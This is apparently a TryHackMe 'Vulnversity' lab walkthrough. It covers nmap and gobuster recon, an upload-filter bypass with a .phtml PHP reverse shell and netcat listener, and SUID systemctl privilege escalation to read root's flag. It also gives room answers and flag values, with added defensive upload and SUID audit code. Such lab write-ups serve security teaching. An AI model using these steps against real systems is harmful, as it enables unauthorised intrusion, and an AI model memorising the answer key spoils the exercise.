THM | Vulnversity

VULNVERSITY

  • Learn about active recon, web app attacks and privilege escalation.

Task 1: Deploy The Machine

  • Here we will simply deploy the machine by selecting [Start Machine], labeled in green, and then select [Start AttackBox] at the top, labeled in blue.

Task 2: Reconnaissance

  • After deployment, we now have a machine that we can target and attack. We see the following information:

Title, IP Address, Expires.

  • The piece I am concerned with here is the IP Address. In order to gather more information about the machine, we can use the network scanning tool Nmap (Network Mapper) to gain some more insight into the target host.

  • To scan the target machine, one command we can run is nmap -sV. This command will probe the host’s open ports and attempt to determine its service/version information. My IP Address for my given machine in this session is 10.10.224.64, so we’ll stick with that.

nmap -sV 10.10.224.64

Nmap Background:

  • Nmap is a free, open-source and powerful tool used to discover hosts (computers) and services on a computer network. In our example, we are using Nmap to scan this machine (with the IP Address: 10.10.224.64) to identify all services running on a particular port. (Keep in mind: ports are really just a landing area for a specific protocol. SSH runs on 22 while HTTP runs on 80, and so on.)

  • Nmap has many capabilities; the table below summarises some of its functionality for your reference:

Nmap Flag scan descriptions.

  • After the scan is completed, we glean the following information:

You should see something like this.

  • What this tells us is that we have discovered 6 ports that are actively open. This information will help us answer the following questions:

Q: Scan the box; how many ports are open?

A: 6

Q: What version of the squid proxy is running on the machine?

A: 3.5.12

Q: How many ports will Nmap scan if the flag -p-400 was used?

A: 400

Q: What is the most likely operating system this machine is running?

A: Ubuntu

Q: What port is the web server running on?

A: 3333

(Note: After running [nmap -sV 10.10.224.64] we see “Apache” which is indeed a webserver.)

Q: What is the flag for enabling verbose mode using Nmap?

A: -v

Task 3: Locating Directories Using Gobuster

  • With Gobuster, what we are going to do is locate a directory within the web app that isn’t supposed to be exposed (i.e. discover a vulnerability) and use this to our advantage to upload a reverse shell that will call back to us, so we can accept the connection and get into the web server itself.

  • Here’s a table that summarizes some of Gobuster’s functionality:

Gobuster Flag scan descriptions.

  • What we are told to do in the room is to run the following:

gobuster dir -u http://10.10.224.64:3333

  • That part we can understand. What we are trying to do here is use the Gobuster tool to search for directories within the provided URL. Easy enough. However, we need to tell it what to look for. That’s where wordlists come in. The room tells us that a wordlist can be found at the following path within the AttackBox:

/usr/share/wordlists/dirbuster/directory-list-1.0.txt

  • If you open that .txt file you will see the list of words Gobuster will try as directory names against the web app at 10.10.224.64.

  • The complete command you should run is as follows:

gobuster dir -u http://10.10.224.64:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

  • Here is the output we should receive:

  • Take note that /internal/ is the only directory that is out of the ordinary. All other directories are to be expected on a public-facing website. If you append /internal/ to the URL (e.g. http://10.10.224.64:3333/internal/) it displays a page for uploading files.

Q: What is the directory that has an upload form page?

A: /internal/

http://10.10.224.64:3333/internal/ file upload page.

  • Now, even though we have discovered the webpage, we don’t have to stop there. In the Firefox browser, if you go to extensions and search for “Wappalyzer”, you can install and enable the extension. This will allow you to glean some insight into how the site was built and what file types it may or may not allow. Since we are the aggressor, naturally we want to uncover what file types are allowed so as to use that against the site.

Task 4: Compromise the Webserver

  • Now that we have found a form to upload files, we can leverage this to upload and execute our payload, which will lead to compromising the web server.

  • The room wants us to “fuzz” the upload form and try some file extensions on it to see which it accepts. Instead of using Burp Suite, we could just try the 5 different PHP file extensions and see which one gets through and which ones get blocked. After a little trial and error, you will find that .phtml is the only one of them that is allowed, which we will use for our payload.

Q: What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.

A: .php

(Note: .php is a file type you would want to upload because it would allow you to upload source code in order to exploit the server.)

Q: Run this attack, what extension is allowed?

A: .phtml
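As an added defensive illustration (not code from the room or this write-up’s author), here is the kind of extension check the upload form appears to use, a denylist that refuses only .php, next to an allowlist check that also rejects .phtml and multi-extension names. The function names, extension sets and sample filenames are constructed for this example.

```python
import os
import re
import secrets
from typing import Optional

# What the room's upload form appears to do: refuse only a literal .php ending.
DENYLIST = {".php"}

# Extensions a stock Apache + mod_php install hands to the PHP interpreter; .phtml
# is among them, which is why the room's .phtml upload executes server-side.
PHP_HANDLER_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phps", ".phar"}

# What an image-upload form should accept, and nothing else (constructed allowlist).
IMAGE_ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}


def denylist_check(filename: str) -> bool:
    """Vulnerable check: passes anything whose last extension is not exactly .php."""
    return os.path.splitext(filename)[1].lower() not in DENYLIST


def allowlist_check(filename: str) -> bool:
    """Hardened check: plain basename, safe stem, final extension on the allowlist, and
    no PHP handler extension anywhere in the name (shell.phtml.jpg is refused, since
    Apache can apply a handler to any dotted segment, not just the last one)."""
    if not filename or os.path.basename(filename) != filename:
        return False                      # empty name or contains path separators
    parts = filename.lower().split(".")
    if len(parts) < 2 or not re.fullmatch(r"[a-z0-9_-]+", parts[0]):
        return False                      # no extension, dotfile, or odd characters
    if "." + parts[-1] not in IMAGE_ALLOWLIST:
        return False
    return not any("." + seg in PHP_HANDLER_EXTS for seg in parts[1:-1])


def stored_name(filename: str) -> Optional[str]:
    """Server-chosen storage name: random stem plus the validated extension, so the
    uploader neither names the file nor can predict the path to request it at."""
    if not allowlist_check(filename):
        return None
    return secrets.token_hex(16) + "." + filename.lower().rsplit(".", 1)[1]
```

Storing uploads under a server-chosen random name (and outside any directory the web server executes scripts from) removes the predictable /internal/uploads/&lt;name&gt; path the room relies on.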

  • Now that we know this, we can use the given “php-reverse-shell” from the following URL:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

  • Select “Copy raw file” on the top right-hand side and paste it into a .phtml file of your choosing. I’ve gone ahead and named mine “twistcut.phtml”. (This, mind you, is all being done inside the THM AttackBox.)

  • After you paste the reverse shell code into the file, you need to set the IP it calls back to. Go to http://10.10.10.10 in the browser of your TryHackMe-connected device; it will display a flag and your VPN/TryHackMe (tun0) IP, in my case 10.10.90.23. In your twistcut.phtml file, put that tun0 IP into the $ip variable of the php-reverse-shell code. Now you can save and exit.

  • (Note: Make sure you insert the tun0 IP and not the target machine’s IP. If you use the target’s IP it will not work.)

  • Now, in your terminal, start a listener so the payload has something to connect back to when you submit the .phtml file. Run the following command in the terminal:

nc -lvnp 1234

  • Go to the upload page and submit the “twistcut.phtml” file. Once you do, append /uploads/twistcut.phtml to the URL to trigger the payload and get into the web server. The URL should read:

http://10.10.65.1:3333/internal/uploads/twistcut.phtml

  • If you look back at your terminal you’ll find that you are in and have successfully taken control of the webserver. In order to get the next two flags, you will want to run the following or a variation of the following:

ls

cd home

ls

cd bill

ls

cat user.txt

  • This will give you both flags required to continue down the room.

Q: What is the name of the user who manages the webserver?

A: bill

Q: What is the user flag?

A: 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: PrivEsc

  • Next, you want to bring in a tool called “LinPEAS”. This tool is specifically designed for Linux machines: it is a script that searches for possible paths to escalate privileges on Linux/Unix/macOS hosts. Essentially, it will show you what might be vulnerable and highlight it for you so you can escalate your privileges and move even further into the web server host.

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

  • After running LinPEAS you will find that “/bin/systemctl” stands out the most among the SUID files. This answers the question:

Q: On the system, search for all SUID files. Which file stands out?

A: /bin/systemctl

  • Now that we know that particular path is vulnerable, we can use a tool called “GTFOBins”. This tool is a “curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems”. Perfect, because we know exactly what we are looking for. Enter [+SUID] into the search bar and look for “systemctl” as you scroll down. Follow the instructions it gives you and run the program using its original path. It should look something like this:

cd /tmp

eop=$(mktemp).service

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop

/bin/systemctl link $eop

/bin/systemctl enable --now $eop

From here you should be good to go: read /tmp/output (the file the service wrote) to find your final flag!
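Two checks a defender would run against what this task shows, added here as an example and not part of the room or this write-up: an audit of the SUID list that flags systemctl (the binary LinPEAS surfaces above) and anything off a baseline, and a check for unit files in /etc/systemd/system that resolve to a location outside the trusted unit directories, which is exactly what `systemctl link` of a unit in /tmp leaves behind. The baseline set, the sample find output and the trusted-directory list are constructed for this example.

```python
import os

TRUSTED_UNIT_DIRS = ("/etc/systemd/system", "/lib/systemd/system",
                     "/usr/lib/systemd/system", "/run/systemd")

# Constructed baseline of binaries that are SUID by design on a stock Ubuntu host,
# compared by basename so /bin vs /usr/bin (merged-usr) layouts do not alert.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "ping", "chsh",
                 "chfn", "gpasswd", "newgrp", "fusermount", "pkexec"}
NEVER_SUID = {"systemctl"}   # SUID root here is a direct path to root, as the room shows

# Constructed find(1) output (find / -perm -4000 -type f) standing in for LinPEAS's list.
SAMPLE_FIND_OUTPUT = "/usr/bin/passwd\n/usr/bin/sudo\n/bin/su\n/bin/mount\n/bin/systemctl\n"


def audit_suid(find_output: str, expected=EXPECTED_SUID):
    """Return (path, reason) for each SUID file that is dangerous or off-baseline."""
    findings = []
    for path in (line.strip() for line in find_output.splitlines() if line.strip()):
        name = os.path.basename(path)
        if name in NEVER_SUID:
            findings.append((path, "must never be SUID"))
        elif name not in expected:
            findings.append((path, "not in SUID baseline"))
    return findings


def foreign_units(link_targets):
    """Given (unit_path, resolved_target) pairs, return the units whose real file lives
    outside the trusted unit directories, e.g. a unit linked from /tmp. Masked units
    (symlinks to /dev/null) are legitimate and skipped."""
    bad = []
    for unit, target in link_targets:
        real = os.path.normpath(target)
        if real == "/dev/null":
            continue
        if not any(real == d or real.startswith(d + "/") for d in TRUSTED_UNIT_DIRS):
            bad.append((unit, real))
    return bad


def scan_unit_dir(dirpath="/etc/systemd/system"):
    """Resolve every entry of a live unit directory and run foreign_units() over it."""
    with os.scandir(dirpath) as it:
        pairs = [(entry.path, os.path.realpath(entry.path)) for entry in it]
    return foreign_units(pairs)
```

The remediation for the finding the room exploits is to remove the SUID bit from systemctl (chmod u-s) and to delete any unit links that resolve into world-writable locations.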

Q: Become root and get the last flag (/root/root.txt)

A: a58ff8579f0a9270368d33a9966c7fd5

Congratulations!